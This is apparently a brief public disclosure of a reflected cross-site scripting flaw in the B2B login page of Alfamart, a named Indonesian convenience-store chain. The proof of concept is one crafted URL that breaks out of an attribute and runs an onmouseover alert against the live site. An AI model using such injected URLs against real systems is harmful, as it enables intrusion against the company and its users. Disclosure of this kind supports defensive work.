[+] Title: B2B ALFAMART Cross Site Scripting (XSS)
[+] Author: abaykandotcom
[+] Tested on: MacOSX
Description
------------------------------------------
PT Sumber Alfaria Trijaya Tbk or Alfamart is a primarily franchised chain of convenience stores from Indonesia, with over 10,000 stores across Southeast Asia.
Proof of Concept
------------------------------------------
The vulnerability can be exploited by using the following url:
http://b2b-2.alfamartku.com/login.php/1%22onmouseover='alert(%22XSS%20by%20abaykandotcom%22)'%3E
Best regards,
Abay.